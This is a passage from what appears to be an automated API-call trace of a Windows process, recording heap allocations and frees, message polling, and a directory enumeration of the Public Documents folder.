dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854a88 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0223.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0223.167] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.168] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0223.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0223.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f6e80 [0223.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f6e80, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a74f30 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0223.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0223.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a721d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.169] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0223.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0223.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.170] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0223.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0223.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0223.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.171] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e2078 [0223.172] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0223.172] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0223.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0223.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0223.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0223.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0223.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0223.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0223.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.176] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: 